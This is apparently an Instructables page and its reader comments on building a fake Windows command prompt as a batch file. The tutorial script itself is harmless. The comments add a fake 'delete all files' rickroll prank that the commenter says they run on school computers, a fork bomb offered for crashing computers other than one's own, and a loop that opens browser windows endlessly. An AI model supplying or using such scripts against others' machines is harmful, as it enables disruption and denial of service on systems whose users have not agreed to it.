Step 1: Creating the document.
This will create the document u need to create the command prompt.

PDF Downloads
As a Pro member, you will gain access to download any Instructable in the PDF format.
You also have the ability to customize your PDF download.
********************
@echo off
title Command Prompt - by account3r2
ver
echo (C) Copyright Microsoft Corp.
echo.
:cmd
set /p "cmd=%cd%>"
%cmd%
echo.
goto cmd
************************
its awesome check it out copy BETWEEN THE stars (******)
thanks
The one in this tut, although old, is green and is completely customized based on your wants.
Trust me, if you think batch is cool, learn a new language that is actually useful like C++ or C#. Those are probably the coolest. You also have Ruby and Python which I incredibly love and Java for some cool stuff as well.
%Drive letter name%:\cmd.exe command /perameters
echo Delete all files? (Y/N)
pause >nul
dir /s
dir /s
msg * All files deleted...
start http://bit.ly/RR
msg * RICK ROLL'd!!!!!!!! lol n00b
I do this to all the computers at school. lol
@echo off
echo Delete all files? (Y/N)
pause >nul
dir /s
echo all files deleted. press e to exit
pause >nul
echo RICK ROLL'd!!!!!!!! lol n00b
pause >nul
hey in return ill give you something copy this and save as a batch file in notepad:
:s
start %0
goto :s
but dont run it on ur own computer or it will crash from pulling up cmd so many times! =D
start
filename.extension*
and then name it filename.extension*
*example: hack.bat or hack.cmd
@echo off
:p
start iexplore.exe
goto p
i take no responsiility for what you do after reading this comment
@echo off
color 0a
:Input
title @ %CD%
echo.
set/p "command= +++> "
%command%
goto Input